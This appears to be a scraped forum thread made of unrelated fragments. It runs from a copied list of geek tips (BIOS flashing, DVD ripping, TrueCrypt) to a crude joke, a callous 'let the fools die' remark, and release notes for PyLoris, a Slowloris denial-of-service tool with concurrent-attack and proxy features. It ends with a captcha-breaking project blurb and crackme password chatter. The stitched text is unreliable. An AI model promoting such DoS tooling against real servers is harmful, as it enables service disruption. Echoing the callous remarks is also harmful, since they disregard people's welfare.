The days of hot incandescent and mercury-laden fluorescent are gone, and in are the days of long lasting, low heat, low consumption LEDs. As any good geek, you want to be able to say "I was doing X long before it became mainstream." Here's your chance--the following link will show you how to put an LED inside a lightbulb, something sure to stump your friends the same way Grandpa's ship-in-a-wine-bottle used to stump you.
http://blog.makezine.com/archive/2006/06/make_a_led_bulb.html

58. Create Music with Keyboard
How awesome is KeyBored?
This little app gives all of your QWERTY keys a piano note. When you type, it sounds like an infant monkey punching a keyboard. If you've got some musical chops, it won't take you long to figure out the Star Wars theme or find a hidden musical message in Counter Strike control buttons. http://agdoa.net/ [edit:link updated] 59. Make Your Office Ergonomic Face it--you spend a lot of time at your desk. You might even have a few extra pounds and pallid skin to show for it. While those things are temporary, far to common and more serious is the carpal tunnel, eye strain, and back problems you'll develop from having a poor workspace. Hit up this link to create a body-friendly workspace that will keep you limber and flexible: http://www.ergotron.com/tabid/305/language/en-US/default.aspx 60. Adding a Third Monitor Studies show that dual monitor increase work productivity by 30%. As a geek, you'll need a third monitor to equal the dual setup of a layman (if that makes sense). While any hack with a VGA port can add a second monitor, it takes a true geek to add a third (or more). This will vary based on graphics/OS, so hit up Google for a tutorial or two. 61. How to Convert a DVD to x264 (or XviD or DivX) It might seem like child's play to you, but many individuals do not understand the fine art of converting a DVD into a digital file, let alone the careful skills it takes to achieve a happy balance between size and quality. Here is an excellent tutorial demonstrating how to rip a DVD with the multi-platform free software Handbrake: http://howto.diveintomark.org/ipod-dvd-ripping-guide/ 62. Flash System BIOS Ya gotta do it some time, so stop putting it off and man up. Flashing the BIOS on your laptop might seem scary (as it should--fear keeps you on your toes and prevents mistakes), but it's not (actually, it is, but if you even understand why you need to do this, you've gotta have at least a few chops by now). Warning--you can seriously bork your computer doing this! 
http://www.pcstats.com/articleview.cfm?articleID=1605 63. How to Irrecoverably Protect Data TrueCrypt, my friends. Learn to use TrueCrypt. If you have ask why, you don't need it. 64. The Fastest way to Kill a Computer It's said that you have to get into a killers mind to understand their weaknesses, right? Same goes for the unfortunate boobs who always kill their laptops. Here's a list of all the different ways you can accidentally kill a computer--arm your family and friends, and save yourself grief (because it's surely you they will call when something goes horribly, horribly wrong). http://www.pcstats.com/articleview.cfm?articleID=1720 Page:1/1 source : http://laptoplogic.com/resources/64-things-every-geek-should-know //as mai adauga 65. What boobies feel like.
-
Do you really have to look after someone else's ass? There are too many of us as it is; let the fools die, I have nothing against it.
-
Pro. "People should seek their own happiness"; if smoking does them good, why not?
-
We have been waiting a long time for Motoma to release this version! Finally, he has released PyLoris version 3.0!

“PyLoris is a tool for testing a web server’s vulnerability to Denial of Service (DoS) attacks. It uses the Slowloris method; by using all available connections web servers cannot complete valid requests. Supports SOCKS, SSL, and all HTTP request methods.”

There are major changes in this version! This is a very brief change log:

* Tkinter GUI
* Scripting API
* Intelligent Thread & Exception Handling
* Supports options to be pulled from files
* Multiple concurrent attack support
* ScriptLoris class for easy extension and prepackaged attack creation
* libloris module providing attack API
* Highly configurable HTTP connection consuming DoS
* HTTPS support
* GET, POST, HEAD and other headers supported
* SOCKS4 and SOCKS5 proxies supported
* Written in Python
* Cross Platform; supported on Windows, Linux, and Mac OS X
* Forging Referer header for servers inaccessible directly
* Gzip encoding to test for CVE-2009-1891 vulnerability
* Many more bug fixes!

Browse PyLoris Files on SourceForge.net
-
PWNtcha stands for "Pretend We’re Not a Turing Computer but a Human Antagonist", as well as PWN capTCHAs. This project’s goal is to demonstrate the inefficiency of many captcha implementations.

PWNtcha - Caca Labs
-
You cracked everything, you got past all the obstacles and the encryption, sincere congratulations, Usr6! Indeed, game over, but not for long: part two is coming, more interesting, more complicated, more captivating.
-
pass = 1337;
for (i = 1; i <= year; i++) {
    pass += year * i * year;
}
if (pass == 318338237039211050000) blah blah

Isn't this, more precisely: 1337 + x^2*1 + x^2*2 + ... + x^2*x = 318338237039211050000?
-
I did it. Is that the one you got stuck on? :)) Open your eyes, the password is where it shouldn't be xD
-
Great! For the new password, you will use the hint from readme.txt and a previously used password.